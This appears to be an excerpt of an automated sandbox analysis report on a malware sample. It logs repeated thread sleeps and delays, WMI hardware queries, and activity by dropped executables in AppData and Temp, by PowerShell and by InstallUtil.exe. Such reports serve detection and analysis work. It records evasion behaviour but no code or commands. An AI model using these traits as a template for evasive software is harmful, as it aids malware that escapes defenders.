                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7660Thread sleep count: 3351 > 30
                    Source: C:\Users\user\Desktop\file.exe TID: 7660Thread sleep count: 910 > 30
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99546s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99219s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99108s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -99000s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98877s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98750s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98640s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98526s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98360s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98234s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98125s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -98015s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7632Thread sleep time: -97906s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe TID: 7620Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep count: 5856 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 3886 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7864Thread sleep count: 1719 > 30
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7864Thread sleep count: 2069 > 30
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99874s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99656s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99546s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99434s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99316s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -99187s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98921s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98804s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98687s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98574s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98468s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98359s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -98249s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -97989s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -97859s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7832Thread sleep time: -97746s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7844Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe TID: 7812Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep count: 39 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep count: 4960 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep count: 4684 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99670s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99448s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99122s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -99001s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98624s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98507s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98389s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98272s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -98000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59881s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59757s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59641s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59515s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59387s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59278s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59171s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -59062s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58942s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58801s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58643s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58397s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58259s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -58016s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57669s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57344s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57231s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57121s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -57008s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56895s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56118s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -56000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -55877s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -55750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -55641s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 8118 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 1388 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -16602069666338586s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 7628Thread sleep count: 3588 > 30
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99834s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 7628Thread sleep count: 601 > 30
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99703s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99565s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -99108s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98999s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98527s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98406s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98295s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98186s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -98051s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97922s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97810s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97703s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97593s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 5804Thread sleep time: -97484s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99546
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99219
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99108
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 99000
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98877
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98750
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98640
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98526
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98360
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98234
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98125
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 98015
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 97906
                    Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99874
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99656
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99546
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99434
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99316
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 99187
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98921
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98804
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98687
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98574
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98468
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98359
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 98249
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 97989
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 97859
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 97746
                    Source: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99670
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99448
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99122
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98624
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98507
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98389
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98272
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 60000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59881
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59757
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59062
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58942
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58801
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58643
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58516
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58397
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58259
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58141
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57669
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57231
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57121
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56895
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56118
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 56000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 55641
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99834
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99703
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99565
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99437
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99328
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99218
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 99108
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98999
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98890
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98765
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98527
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98406
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98295
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98186
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 98051
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97922
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97810
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97703
                    Source: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exeThread delayed: delay time: 97593
